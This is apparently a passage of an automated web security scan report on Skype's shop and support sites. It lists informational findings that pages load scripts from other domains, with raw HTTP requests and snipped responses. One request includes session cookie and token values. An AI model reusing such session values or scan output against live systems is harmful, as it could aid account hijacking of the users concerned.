...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.380. http://shop.skype.com/apps/Integrations-with-popular-software/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Integrations-with-popular-software/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Integrations-with-popular-software/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.381. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Mobile-video-communications/Qik-Video-for-Android.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Mobile-video-communications/Qik-Video-for-Android.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.382. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Mobile-video-communications/Qik-Video-for-Apple.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Mobile-video-communications/Qik-Video-for-Apple.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.383. http://shop.skype.com/apps/Mobile-video-communications/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Mobile-video-communications/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Mobile-video-communications/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.384. http://shop.skype.com/apps/Search-Results.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Search-Results.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Search-Results.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.385. http://shop.skype.com/apps/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 124501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.386. http://shop.skype.com/go/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/shop

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/shop HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.387. http://shop.skype.com/go/shop.accessories.headsets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/shop.accessories.headsets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/shop.accessories.headsets HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.388. http://shop.skype.com/go/shop.accessories.phones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/shop.accessories.phones

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/shop.accessories.phones HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.389. http://shop.skype.com/go/shop.accessories.webcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/shop.accessories.webcams

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/shop.accessories.webcams HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.390. http://shop.skype.com/go/shop.extras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/shop.extras

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/shop.extras HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.391. http://shop.skype.com/go/tvwebcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /go/tvwebcams

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/tvwebcams HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.392. http://shop.skype.com/intl/[LC]/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /intl/[LC]/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/[LC]/ HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.393. https://support.skype.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /de/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /de/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: de
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 62986


<!DOCTYPE html>


<html lang="de" >

<head>

<title>Hilfe f..r Skype ... Nutzerleitf..den, FAQs und Kundendienst</title>
   <meta name="description" content="Hilfe bei der Nutzung von Sk
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.394. https://support.skype.com/en-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=8FC8EBA392E9AF68958ED49F2161B548; skypeSessionId=8FC8EBA392E9AF68958ED49F2161B548
Host: support.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:08:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 64357
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
X-Pad: avoid browser bug


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user g
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.395. https://support.skype.com/en-us/category/ABOUT_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/ABOUT_SKYPE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/ABOUT_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51928


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.396. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/AFFILIATE_PROGRAM/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/AFFILIATE_PROGRAM/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51651


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.397. https://support.skype.com/en-us/category/BANK_TRANSFERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BANK_TRANSFERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/BANK_TRANSFERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52289


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.398. https://support.skype.com/en-us/category/BIZ_VERSION/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BIZ_VERSION/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/BIZ_VERSION/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47680


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.399. https://support.skype.com/en-us/category/BLACKBERRY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BLACKBERRY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/BLACKBERRY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47667


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.400. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BUYING_ACCESSORIES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/BUYING_ACCESSORIES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53814


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
